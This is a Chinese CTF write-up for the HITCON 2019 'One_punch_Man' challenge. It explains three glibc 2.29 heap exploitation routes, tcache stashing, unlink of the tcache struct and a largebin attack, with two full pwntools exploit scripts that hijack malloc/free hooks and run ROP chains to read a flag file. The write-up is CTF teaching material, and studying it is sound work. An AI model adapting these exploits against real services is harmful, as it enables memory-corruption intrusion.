HITCON2019-Quals One_punch_Man

这题是在glibc2.29下的利用，所以记录下解题学到的一些新颖的思路

程序分析

保护全开，有seccomp：

ruan@ruan:/mnt/hgfs/shared/hitcon2019/one_punch$ seccomp-tools dump ./one_punch
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
 0002: 0x06 0x00 0x00 0x00000000  return KILL
 0003: 0x20 0x00 0x00 0x00000000  A = sys_number
 0004: 0x15 0x00 0x01 0x0000000f  if (A != rt_sigreturn) goto 0006
 0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0006: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0008
 0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0008: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0010
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0010: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0012
 0011: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0012: 0x15 0x00 0x01 0x00000000  if (A != read) goto 0014
 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0014: 0x15 0x00 0x01 0x00000001  if (A != write) goto 0016
 0015: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0016: 0x15 0x00 0x01 0x0000000c  if (A != brk) goto 0018
 0017: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0018: 0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0020
 0019: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0020: 0x15 0x00 0x01 0x0000000a  if (A != mprotect) goto 0022
 0021: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0022: 0x15 0x00 0x01 0x00000003  if (A != close) goto 0024
 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0024: 0x06 0x00 0x00 0x00000000  return KILL

retire函数里的UAF：

void retire()
{
  unsigned int v0; // [rsp+Ch] [rbp-4h]

  writen("idx: ");
  v0 = get_int();
  if ( v0 > 2 )
    error((__int64)"invalid");
  free((void *)chunks[v0].ptr);
}

debut函数会先把我们的输入读入到栈上，然后才复制到申请的堆块中，所以可以利用这来进行rop

unsigned __int64 __fastcall debut(__int64 a1, __int64 a2)
{
  unsigned int v3; // [rsp+8h] [rbp-418h]
  signed int v4; // [rsp+Ch] [rbp-414h]
  char s[1032]; // [rsp+10h] [rbp-410h]
  unsigned __int64 v6; // [rsp+418h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  writen("idx: ");
  v3 = get_int();
  if ( v3 > 2 )
    error((__int64)"invalid");
  writen("hero name: ");
  memset(s, 0, 0x400uLL);
  v4 = read(0, s, 0x400uLL);
  if ( v4 <= 0 )
    error((__int64)"io");
  s[v4 - 1] = 0;
  if ( v4 <= 0x7F || v4 > 0x400 )
    error((__int64)"poor hero name");
  chunks[v3].ptr = (__int64)calloc(1uLL, v4);
  chunks[v3].sz = v4;
  strncpy((char *)chunks[v3].ptr, s, v4);
  memset(s, 0, 0x400uLL);
  return __readfsqword(0x28u) ^ v6;
}

一个后门选项：

__int64 __fastcall sub_15BB(__int64 a1, __int64 a2)
{
  void *buf; // [rsp+8h] [rbp-8h]

  if ( *(_BYTE *)(heap_base + 0x20) <= 6 )
    error((__int64)"gg");
  buf = malloc(0x217uLL);
  if ( !buf )
    error((__int64)"err");
  if ( read(0, buf, 0x217uLL) <= 0 )
    error((__int64)"io");
  puts("Serious Punch!!!");
  puts(&unk_2128);
  return puts(buf);
}

题目的debut函数用的是calloc函数,意味着进入了tcache的堆块是不会在被取出来了，但是后门函数里用的是malloc，所以我们的目标就是要使得*(_BYTE *)(heap_base + 0x20) > 6，已达到利用后门的效果

思路1

很自然的想到要是能用unsortedbin attack就好了，但是这在libc2.29下是行不通的：

while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
       {
         bck = victim->bk;
         size = chunksize (victim);
         mchunkptr next = chunk_at_offset (victim, size);

         if (__glibc_unlikely (size <= 2 * SIZE_SZ)
             || __glibc_unlikely (size > av->system_mem))
           malloc_printerr ("malloc(): invalid size (unsorted)");
         if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
             || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
           malloc_printerr ("malloc(): invalid next size (unsorted)");
         if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
           malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
         if (__glibc_unlikely (bck->fd != victim)
             || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
           malloc_printerr ("malloc(): unsorted double linked list corrupted");
         if (__glibc_unlikely (prev_inuse (next)))
           malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

我后来谷歌了下wp，找到了一篇wp,里面用的方法有点类似于unsortedbin attack,不得不佩服大佬的思路，orz

文章里提到的方法是，当从smallbin里申请一个堆块的时候，会把剩下的smallbin也链入相对应大小的tcache，前提是相应大小的tcache没满，相对应的源码为：

if (in_smallbin_range (nb))
    {
      idx = smallbin_index (nb);
      bin = bin_at (av, idx);

      if ((victim = last (bin)) != bin)
        {
          bck = victim->bk;
	  if (__glibc_unlikely (bck->fd != victim))
	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
          set_inuse_bit_at_offset (victim, nb);
          bin->bk = bck;
          bck->fd = bin;

          if (av != &main_arena)
	    set_non_main_arena (victim);
          check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
	  /* While we're here, if we see other chunks of the same size,
	     stash them in the tcache.  */
	  size_t tc_idx = csize2tidx (nb);
	  if (tcache && tc_idx < mp_.tcache_bins)
	    {
	      mchunkptr tc_victim;

	      /* While bin not empty and tcache not full, copy chunks over.  */
	      while (tcache->counts[tc_idx] < mp_.tcache_count
		     && (tc_victim = last (bin)) != bin)
		{
		  if (tc_victim != 0)
		    {
		      bck = tc_victim->bk;
		      set_inuse_bit_at_offset (tc_victim, nb);
		      if (av != &main_arena)
			set_non_main_arena (tc_victim);
		      bin->bk = bck;
		      bck->fd = bin;

		      tcache_put (tc_victim, tc_idx);
	            }
		}
	    }
#endif
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }
    }

此处是没有对smallbin进行check的：

if (tc_victim != 0)
		    {
		      bck = tc_victim->bk;
		      set_inuse_bit_at_offset (tc_victim, nb);
		      if (av != &main_arena)
			set_non_main_arena (tc_victim);
		      bin->bk = bck;
		      bck->fd = bin;

所以我们可以伪造tc_victim->bk,然后到了bck->fd=bin这一句，就可以向一个地址写入一个libc的值了，类似于unsortedbin attack,要注意的话就是相对应大小的tcache bin为6个，这样的话tcache_put后，就会退出循环，把chunk返回，不会造成段错误

这里有个大问题，就是程序申请的堆块大小范围在0x7f~0x400之间，所以在tcache没满的情况下，free后都会进入tcache,那要怎么让一个大小的堆块，比如0x100大小的堆块，相对应的tcache bin有6块，smallbin有两块，文章里又提到了用last_remainder：

if (in_smallbin_range (nb) &&
             bck == unsorted_chunks (av) &&
             victim == av->last_remainder &&
             (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
           {
             /* split and reattach remainder */
             remainder_size = size - nb;
             remainder = chunk_at_offset (victim, nb);
             unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
             av->last_remainder = remainder;
             remainder->bk = remainder->fd = unsorted_chunks (av);
             if (!in_smallbin_range (remainder_size))
               {
                 remainder->fd_nextsize = NULL;
                 remainder->bk_nextsize = NULL;
               }

             set_head (victim, nb | PREV_INUSE |
                       (av != &main_arena ? NON_MAIN_ARENA : 0));
             set_head (remainder, remainder_size | PREV_INUSE);
             set_foot (remainder, remainder_size);

             check_malloced_chunk (av, victim, nb);
             void *p = chunk2mem (victim);
             alloc_perturb (p, bytes);
             return p;
           }

比如我们把unsortedbin切成了0x100的大小，如果在calloc一个比这个大的chunk,那这个unsortedbin就会被放到smallbin，相对应的源码为：

/* place chunk in bin */

         if (in_smallbin_range (size))
           {
             victim_index = smallbin_index (size);
             bck = bin_at (av, victim_index);
             fwd = bck->fd;
           }
         else
           {
             victim_index = largebin_index (size);
             bck = bin_at (av, victim_index);
             fwd = bck->fd;

这样的话一切条件都有了,真正的one_punch

还有一点要注意的是，我们用这个方法把heap+0x30的地方改写了，这样的话其实tcache会 corrupt 掉：

pwndbg> bins
tcachebins
0x100 [  7]: 0x563a59056000 —▸ 0x563a59053760 —▸ 0x563a59053660 —▸ 0x563a59053560 —▸ 0x563a59053460 —▸ 0x563a59053360 —▸ 0x563a59053260 ◂— 0x0
0x1d0 [-112]: 0x0
0x1e0 [-19]: 0x0
0x1f0 [-41]: 0x0
0x200 [-45]: 0x0
0x210 [-99]: 0x0
0x220 [125]: 0x0
0x410 [  7]: 0x563a590550c0 —▸ 0x563a59054cb0 —▸ 0x563a590548a0 —▸ 0x563a59054490 —▸ 0x563a59054080 —▸ 0x563a59053c70 —▸ 0x563a59053860 ◂— 0x0

所以我们要在攻击前先申请一个0x217大小的堆块，然后释放掉，在攻击

exp为：

from pwn import *

context.arch = 'amd64'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))
		

def cmd(c):
	p.recvuntil("> ")
	p.sendline(str(c))
	
def add(idx,name):
	cmd(1)
	p.recvuntil("idx: ")
	p.sendline(str(idx))
	p.recvuntil("name: ")
	p.send(name)
def dele(idx):
	cmd(4)
	p.recvuntil("idx: ")
	p.sendline(str(idx))

def show(idx):
	cmd(3)
	p.recvuntil("idx: ")
	p.sendline(str(idx))

def edit(idx,name):
	cmd(2)
	p.recvuntil("idx: ")
	p.sendline(str(idx))
	p.recvuntil("name: ")
	p.send(name)

def main(host,port=26976):
	global p
	if host:
		p = remote(host,port)
	else:
		p = process("./one_punch")
		# debug(0x0000000000015BB)
		# gdb.attach(p)
	for i in range(2):
		add(i,"A"*0xf8)
	dele(0)
	dele(1)
	show(1)
	p.recvuntil(": ")
	heap = u64(p.recvuntil("\n",drop=True).ljust(8,b"\x00")) - 0x260
	for i in range(4):
		add(0,"A"*0xf8)
		dele(0)
	for i in range(7):
		add(0,"A"*0x400)
		dele(0)
	for i in range(2):
		add(i,"A"*0x400)
	dele(0)
	show(0)
	p.recvuntil(": ")
	libc.address = u64(p.recvuntil("\n",drop=True).ljust(8,b"\x00")) - 0x1e4ca0
	info("heap : " + hex(heap))
	info("libc : " + hex(libc.address))
	add(1,"A"*0x300)
	add(2,"A"*0x400)
	add(1,"A"*0x400)
	dele(2)
	add(1,"A"*0x300)
	add(1,"A"*0x400)
	add(0,"A"*0x217)
	payload = b"\x00"*0x108+b"/flag.txt"+b"\x00"*(0x7+0x1f0)+p64(0x101)+p64(heap+0x27d0)+p64(heap+0x30-0x10-5)
	edit(2,payload)
	dele(0)
	add(2,"A"*0xf8)
	edit(0,p64(libc.symbols["__malloc_hook"]))
	cmd(str(50056))
	p.send("C"*8)
	cmd(str(50056))
	p.send(p64(libc.address+0x000000000008cfd6))
	# pause()
	# 0x000000000008cfd6: add rsp, 0x48; ret;
	# 0x0000000000026542: pop rdi; ret;
	# 0x000000000012bdc9: pop rdx; pop rsi; ret;
	# 0x0000000000047cf8: pop rax; ret;
	# 0x00000000000cf6c5: syscall; ret;
	p_rdi = 0x0000000000026542+libc.address
	p_rdx_rsi = 0x000000000012bdc9+libc.address
	p_rax = 0x0000000000047cf8+libc.address
	syscall_ret = 0x00000000000cf6c5+libc.address
	payload = p64(p_rdi)+p64(heap+0x2df8)+p64(p_rdx_rsi)+p64(0)*2+p64(p_rax)+p64(2)+p64(syscall_ret)
	payload += p64(p_rdi)+p64(3)+p64(p_rdx_rsi)+p64(0x80)+p64(heap+0x2d00)+p64(p_rax)+p64(0)+p64(syscall_ret)
	payload += p64(p_rdi)+p64(1)+p64(p_rax)+p64(1)+p64(syscall_ret)
	payload += p64(p_rdi)+p64(0)+p64(p_rax)+p64(0)+p64(syscall_ret)
	payload = payload.ljust(0x100,b"\x00")
	gdb.attach(p)
	add(2,payload)
	p.interactive()
	
if __name__ == "__main__":
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	main(args['REMOTE'])

思路2

这思路是看ex师傅发在安全客上的wp学到的,tql!

我们知道后门函数要满足*(_BYTE *)(heap_base + 0x20) > 6这个条件，而*(_BYTE *)(heap_base + 0x20)这个位置对应的是tcache 0x220大小堆块的tcache->count,所以如果填满了的话即使进入了后门函数也不会申请到我们想要的地址，所以要控制tcache->entries，这样的话就可以达到任意地址malloc的目的了

原文思路很清晰：

• 用 UAF 构造 chunk overlap
• 用 tcache->counts 来伪造 size， 用 tcache->entries 伪造 fake_chunk 的 fd 和 bk，提前布置好 堆布局，以便绕过 unlink 检查。
• unlink 控制 tcache->entries，劫持hook控制程序流

在unlink前，堆布局是这样的：

unlink后我们就可以控制到 tcache_perthread_struct ->entries,就可以劫持到hook来控制程序执行流了

这里换劫持__free_hook来orw,用了个超好用的gadget：0x000000000012be97: mov rdx, qword ptr [rdi + 8]; mov rax, qword ptr [rdi]; mov rdi, rdx; jmp rax; ,学到了

exp照着wp里来的：

from pwn import *

context.arch = 'amd64'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))
		

def cmd(c):
	p.recvuntil("> ")
	p.sendline(str(c))
	
def add(idx,name):
	cmd(1)
	p.recvuntil("idx: ")
	p.sendline(str(idx))
	p.recvuntil("name: ")
	p.send(name)
def dele(idx):
	cmd(4)
	p.recvuntil("idx: ")
	p.sendline(str(idx))

def show(idx):
	cmd(3)
	p.recvuntil("idx: ")
	p.sendline(str(idx))

def edit(idx,name):
	cmd(2)
	p.recvuntil("idx: ")
	p.sendline(str(idx))
	p.recvuntil("name: ")
	p.send(name)

def main(host,port=26976):
	global p
	if host:
		p = remote(host,port)
	else:
		p = process("./one_punch")
		# debug(0x0000000000015BB)
		gdb.attach(p,"b *setcontext+53")
	add(2, 'a' * 0x217)
	for i in range(2):
		add(0, 'a' * 0x217)
		dele(0)
	show(0)
	p.recvuntil(": ")
	heap = u64(p.recvuntil("\n",drop=True).ljust(8,b"\x00")) - 0x480
	for i in range(5):
		add(0, 'a' * 0x217)
		dele(0)
	dele(2)
	show(2)
	p.recvuntil(": ")
	libc.address = u64(p.recvuntil("\n",drop=True).ljust(8,b"\x00")) - 0x1e4ca0
	info("heap : " + hex(heap))
	info("libc : " + hex(libc.address))
	
	length = 0xe0
	add(0, 'a' * length)
	add(0, 'a' * 0x80)
	edit(2, b'\x00' * length + p64(0) + p64(0x21))
	dele(0)
	edit(2, b'\x00' * length + p64(0) + p64(0x31))
	dele(0)
	edit(2, b'\x00' * length + p64(0) + p64(0x3a1))
	dele(0)
	
	for i in range(3):
		add(1, 'b' * 0x3a8)
		dele(1)
	edit(2, b'\x00' * length + p64(0x300) + p64(0x570) + p64(0) + p64(0) + p64(heap + 0x40) + p64(heap + 0x40))
	dele(0)
	add(0, b'c' * 0x100 + p64(libc.symbols['__free_hook']))
	cmd(str(50056))
	# 0x000000000012be97: mov rdx, qword ptr [rdi + 8]; mov rax, qword ptr [rdi]; mov rdi, rdx; jmp rax; 
	p.send(p64(libc.address+0x000000000012be97))
	# 0x7f903816ae35 <setcontext+53>:	mov    rsp,QWORD PTR [rdx+0xa0]
	# 0x7f903816ae3c <setcontext+60>:	mov    rbx,QWORD PTR [rdx+0x80]
	# 0x7f903816ae43 <setcontext+67>:	mov    rbp,QWORD PTR [rdx+0x78]
	# 0x7f903816ae47 <setcontext+71>:	mov    r12,QWORD PTR [rdx+0x48]
	# 0x7f903816ae4b <setcontext+75>:	mov    r13,QWORD PTR [rdx+0x50]
	# 0x7f903816ae4f <setcontext+79>:	mov    r14,QWORD PTR [rdx+0x58]
	# 0x7f903816ae53 <setcontext+83>:	mov    r15,QWORD PTR [rdx+0x60]
	# 0x7f903816ae57 <setcontext+87>:	mov    rcx,QWORD PTR [rdx+0xa8]
	# 0x7f903816ae5e <setcontext+94>:	push   rcx
	# 0x7f903816ae5f <setcontext+95>:	mov    rsi,QWORD PTR [rdx+0x70]
	# 0x7f903816ae63 <setcontext+99>:	mov    rdi,QWORD PTR [rdx+0x68]
	# 0x7f903816ae67 <setcontext+103>:	mov    rcx,QWORD PTR [rdx+0x98]
	# 0x7f903816ae6e <setcontext+110>:	mov    r8,QWORD PTR [rdx+0x28]
	# 0x7f903816ae72 <setcontext+114>:	mov    r9,QWORD PTR [rdx+0x30]
	# 0x7f903816ae76 <setcontext+118>:	mov    rdx,QWORD PTR [rdx+0x88]
	# 0x7f903816ae7d <setcontext+125>:	xor    eax,eax
	# 0x7f903816ae7f <setcontext+127>:	ret    
	# 00000000000026542: pop rdi; ret;
	# 0x000000000012bdc9: pop rdx; pop rsi; ret;
	# 0x0000000000047cf8: pop rax; ret;
	# 0x00000000000cf6c5: syscall; ret;x
	p_rdi = 0x0000000000026542+libc.address
	p_rdx_rsi = 0x000000000012bdc9+libc.address
	p_rax = 0x0000000000047cf8+libc.address
	syscall_ret = 0x00000000000cf6c5+libc.address
	payload = p64(libc.symbols["setcontext"]+53)+p64(heap+0x1ac0)
	payload += b'/flag.txt'+b'\x00'*7
	payload += p64(0)*9	#offset 0x68
	payload += p64(heap+0x1ad0)	#rdi
	payload += p64(0)		#rsi
	payload += p64(heap+0x2000)	#rbp
	payload += p64(0)*2		#rbx and rdx
	payload += p64(0)*2
	payload += p64(heap+0x1b78)	# rsp
	payload += p64(p_rax)		#rcx
	payload += p64(0xdeadbeef)
	payload += p64(2)
	payload += p64(syscall_ret)
	payload += p64(p_rdi)+p64(3)+p64(p_rdx_rsi)+p64(0x80)+p64(heap+0x2d00)+p64(p_rax)+p64(0)+p64(syscall_ret)
	payload += p64(p_rdi)+p64(1)+p64(p_rax)+p64(1)+p64(syscall_ret)
	payload += p64(p_rdi)+p64(0)+p64(p_rax)+p64(0)+p64(syscall_ret)
	edit(1,payload)
	dele(1)
	p.interactive()
	
if __name__ == "__main__":
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	main(args['REMOTE'])

思路3

思路3是Balsn战队的wp里用到的largebin_attack,首先我觉得一个难点是这题申请的堆块最大为0x410,怎么把大小比0x410还大的unsortedbin放入largebin是第一个要解决的问题，所以从源码入手：

/*
            If a small request, try to use last remainder if it is the
            only chunk in unsorted bin.  This helps promote locality for
            runs of consecutive small requests. This is the only
            exception to best-fit, and applies only when there is
            no exact fit for a small chunk.
          */

         if (in_smallbin_range (nb) &&
             bck == unsorted_chunks (av) &&
             victim == av->last_remainder &&
             (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
           {
             /* split and reattach remainder */
             remainder_size = size - nb;

这是判断是否要把last remainder进行切割的代码，如果条件不满足的话就会进入下面的代码：

/* remove from unsorted list */
          if (__glibc_unlikely (bck->fd != victim))
            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);

          /* Take now instead of binning if exact fit */
		//我们使得size != nb，跳过这个代码块
          if (size == nb)
            {
              set_inuse_bit_at_offset (victim, size);
              if (av != &main_arena)
		set_non_main_arena (victim);
.........................................................
		}
#endif
            }

          /* place chunk in bin */

          if (in_smallbin_range (size))
            {
              victim_index = smallbin_index (size);
              bck = bin_at (av, victim_index);
              fwd = bck->fd;
            }
          else
            {
              victim_index = largebin_index (size);
              bck = bin_at (av, victim_index);
              fwd = bck->fd;

所以wp里的堆布局为：

这样当我们malloc(0x200)的堆块时，就会不满足bck == unsorted_chunks (av)和if (size == nb)从而把这个chunk(0x5601e80414c0)置入largebin中,第二次循环的时候，发现unsorted bin的size刚刚好，直接就取出返回

largebins
0x400: 0x5601e80414c0 —▸ 0x7f58e3c64090 (main_arena+1104)  ◂— 0x5601e80414c0

这样的话就解决了这个问题，剩下的就是largebin_attack了,代码为：

if (in_smallbin_range (size))
           {
             victim_index = smallbin_index (size);
             bck = bin_at (av, victim_index);
             fwd = bck->fd;
           }
         else	//要放入的chunk是largebin
           {
             victim_index = largebin_index (size);
             bck = bin_at (av, victim_index);
             fwd = bck->fd;

             /* maintain large bins in sorted order */
             if (fwd != bck)
               {
                 /* Or with inuse bit to speed comparisons */
                 size |= PREV_INUSE;
                 /* if smaller than smallest, bypass loop below */
                 assert (chunk_main_arena (bck->bk));
                 if ((unsigned long) (size)
	      < (unsigned long) chunksize_nomask (bck->bk))
                   {
                     fwd = bck;
                     bck = bck->bk;

                     victim->fd_nextsize = fwd->fd;
                     victim->bk_nextsize = fwd->fd->bk_nextsize;
                     fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
                   }
                 else
                   {
                     assert (chunk_main_arena (fwd));
                     while ((unsigned long) size < chunksize_nomask (fwd))
                       {
                         fwd = fwd->fd_nextsize;
		  assert (chunk_main_arena (fwd));
                       }

                     if ((unsigned long) size
		  == (unsigned long) chunksize_nomask (fwd))
                       /* Always insert in the second position.  */
                       fwd = fwd->fd;
                     else	//原本在largebin（fwd）的size和要放入的largebin（victim）的size不等
                       {
                         victim->fd_nextsize = fwd;
                         victim->bk_nextsize = fwd->bk_nextsize;
                         fwd->bk_nextsize = victim;
                         victim->bk_nextsize->fd_nextsize = victim;
                       }
                     bck = fwd->bk;
                   }
               }
             else
               victim->fd_nextsize = victim->bk_nextsize = victim;
           }

         mark_bin (av, victim_index);
         victim->bk = bck;
         victim->fd = fwd;
         fwd->bk = victim;
         bck->fd = victim;

所以我们伪造好fwd->bk_nextsize,随后的victim->bk_nextsize->fd_nextsize = victim;就会在fwd->bk_nextsize+0x20的位置写入一个victim,如果我们让这个堆地址写入到heap_base+0x20的位置就能使用后门函数了

把unsortedbin放入largebin之前,(这里插入是不满足victim == av->last_remainder这个条件

放入后：

后续利用和思路1一样，劫持__malloc_hook为add rsp,xx; ret进行rop

参考链接

https://medium.com/@ktecv2000/hitcon-ctf-2019-quals-one-punch-man-pwn-292pts-3e94eb3fd312

https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#one-punch-man

https://www.anquanke.com/post/id/189848